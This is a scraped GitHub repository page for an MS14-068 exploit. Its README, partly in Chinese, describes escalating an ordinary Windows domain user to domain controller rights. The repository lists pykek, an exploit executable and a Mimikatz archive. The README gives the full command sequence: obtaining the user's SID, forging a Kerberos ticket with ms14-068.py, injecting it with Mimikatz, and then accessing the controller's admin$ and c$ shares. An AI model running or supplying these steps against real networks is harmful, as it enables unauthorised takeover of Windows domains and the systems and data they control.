Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
img MS14-068 May 14, 2017
pykek MS14-068 May 14, 2017
MS14-068.exe MS14-068 May 14, 2017
README.md MS14-068 Jun 15, 2017
mimikatz_trunk.zip MS14-068 May 14, 2017

README.md

MS14-068

将普通域用户权限提升为域控权限  
(漏洞利用后,netuse \\swg.server.com\c$可以直接访问域控的网络资源

Vulnerability reference:

Usage

域管理员:DCwin03 域名:demo.com 普通域用户:hx

登录普通域用户hx,cmd中输入"whoami/user"获取sid
demo/hx S-1-5-21-3813283032-1038476579-1047458262-1110

x1
x2

退出域用户hx,登录本地用户123

python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com  

x3 x4

c:\User\123>Mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exit  
  
net use \\DCwin03\admin$  

dir \\DCwin03\c$

References